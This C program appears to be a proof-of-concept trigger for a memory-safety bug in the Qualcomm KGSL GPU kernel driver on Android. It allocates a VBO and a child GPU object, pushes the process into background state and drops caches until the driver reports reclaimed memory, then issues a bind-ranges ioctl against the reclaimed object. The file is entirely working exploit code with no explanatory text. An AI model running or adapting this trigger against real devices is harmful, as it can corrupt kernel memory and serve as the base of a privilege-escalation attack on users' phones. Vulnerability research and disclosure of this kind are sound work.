#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <stdarg.h>
#include <poll.h>
#include <fcntl.h>
#include <ctype.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <stdint.h>
#include <stdbool.h>
#include <stdlib.h>
#include <assert.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

char *systemf(const char *command, ...) {
  char *full_command;
  va_list ap;
  va_start(ap, command);
  SYSCHK(vasprintf(&full_command, command, ap));
  va_end(ap);
  printf("systemf: <<<%s>>>\n", full_command);
  FILE *child_stream = popen(full_command, "r");
  char *result = NULL;
  size_t result_size = 0;
  errno = 0;
  if (getdelim(&result, &result_size, '\0', child_stream) == -1 && errno != 0)
    errx(1, "getdelim reported error");
  if (pclose(child_stream))
    errx(1, "pclose reported error");
  if (result) {
    if (result[0] != '\0' && result[strlen(result)-1] == '\n')
      result[strlen(result)-1] = '\0';
    puts(result);
    puts("================================\n");
  }
  free(full_command);
  return result ? result : strdup("");
}


#define KGSL_IOC_TYPE 0x09
enum kgsl_user_mem_type {
  KGSL_USER_MEM_TYPE_PMEM   = 0x00000000,
  KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001,
  KGSL_USER_MEM_TYPE_ADDR   = 0x00000002,
  KGSL_USER_MEM_TYPE_ION    = 0x00000003,
  KGSL_USER_MEM_TYPE_DMABUF       = 0x00000003,
  KGSL_USER_MEM_TYPE_MAX    = 0x00000007,
};

struct kgsl_gpumem_alloc {
  unsigned long gpuaddr; /* output param */
  size_t size;
  unsigned int flags;
};
#define KGSL_MEMALIGN_SHIFT   16
#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL
#define KGSL_MEMFLAGS_IOCOHERENT  0x80000000ULL
#define KGSL_MEMFLAGS_SECURE      0x00000008ULL
#define KGSL_MEMFLAGS_VBO         (1ULL << 34)
#define KGSL_CACHEMODE_SHIFT 26
#define KGSL_CACHEMODE_WRITECOMBINE 0
#define KGSL_CACHEMODE_UNCACHED 1
#define KGSL_CACHEMODE_WRITETHROUGH 2
#define KGSL_CACHEMODE_WRITEBACK 3
#define KGSL_MEMTYPE_SHIFT    8
#define KGSL_MEMTYPE_OBJECTANY      0
#define IOCTL_KGSL_GPUMEM_ALLOC \
  _IOWR(KGSL_IOC_TYPE, 0x2f, struct kgsl_gpumem_alloc)
unsigned long gpumem_alloc(int kgsl_fd, size_t size, unsigned int flags) {
  struct kgsl_gpumem_alloc kga = { .size = size, .flags = flags };
  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_GPUMEM_ALLOC, &kga));
  return kga.gpuaddr;
}

struct kgsl_gpuobj_alloc {
  __u64 size;
  __u64 flags;
  __u64 va_len;
  __u64 mmapsize;
  unsigned int id;
  unsigned int metadata_len;
  __u64 metadata;
};
#define IOCTL_KGSL_GPUOBJ_ALLOC \
  _IOWR(KGSL_IOC_TYPE, 0x45, struct kgsl_gpuobj_alloc)
uint64_t gpuobj_alloc(int kgsl_fd, size_t size, uint64_t flags) {
  struct kgsl_gpuobj_alloc arg = { .size = size, .flags = flags, .va_len = size };
  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_GPUOBJ_ALLOC, &arg));
  return arg.id;
}

struct kgsl_gpumem_bind_range {
  __u64 child_offset;
  __u64 target_offset;
  __u64 length;
  __u32 child_id;
  __u32 op;
#define KGSL_GPUMEM_RANGE_OP_BIND 1
#define KGSL_GPUMEM_RANGE_OP_UNBIND 2
};
struct kgsl_gpumem_bind_ranges {
  __u64 ranges;
  __u32 ranges_nents;
  __u32 ranges_size;
  __u32 id;
  __u32 flags;
  int fence_id;
  /* private: 64 bit compatibility */
  __u32 padding;
};
#define IOCTL_KGSL_GPUMEM_BIND_RANGES \
  _IOWR(KGSL_IOC_TYPE, 0x56, struct kgsl_gpumem_bind_ranges)




int main(void) {
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);

  printf("pid: %d\n", getpid());

  int kgsl_fd = SYSCHK(open("/dev/kgsl-3d0", O_RDWR));

  unsigned long vbo_id = gpuobj_alloc(kgsl_fd, 0x4000, KGSL_MEMFLAGS_VBO);
  printf("vbo_id=%lu\n", vbo_id);

  unsigned long child_id = gpuobj_alloc(kgsl_fd, 0x1000, 0);

  systemf("echo background > /sys/class/kgsl/kgsl/proc/%d/state", getpid());
  systemf("echo 3 > /proc/sys/vm/drop_caches");

  while (1) {
    unsigned long reclaimed = strtoul(systemf("cat /sys/class/kgsl/kgsl/proc/%d/gpumem_reclaimed", getpid()), NULL, 0);
    if (reclaimed != 0)
      break;
    sleep(1);
  }

  printf("send bind request\n");
  {
    struct kgsl_gpumem_bind_range ranges[] = {
      { .child_offset = 0, .target_offset = 0, .length = 0x1000, .child_id = child_id, .op = KGSL_GPUMEM_RANGE_OP_BIND }
    };
    struct kgsl_gpumem_bind_ranges bind_arg = {
      .ranges = (unsigned long)ranges,
      .ranges_nents = sizeof(ranges)/sizeof(ranges[0]),
      .ranges_size = sizeof(ranges[0]),
      .id = vbo_id,
      .flags = 0
    };
    SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_GPUMEM_BIND_RANGES, &bind_arg));
  }
  printf("bind done\n");

  return 0;
}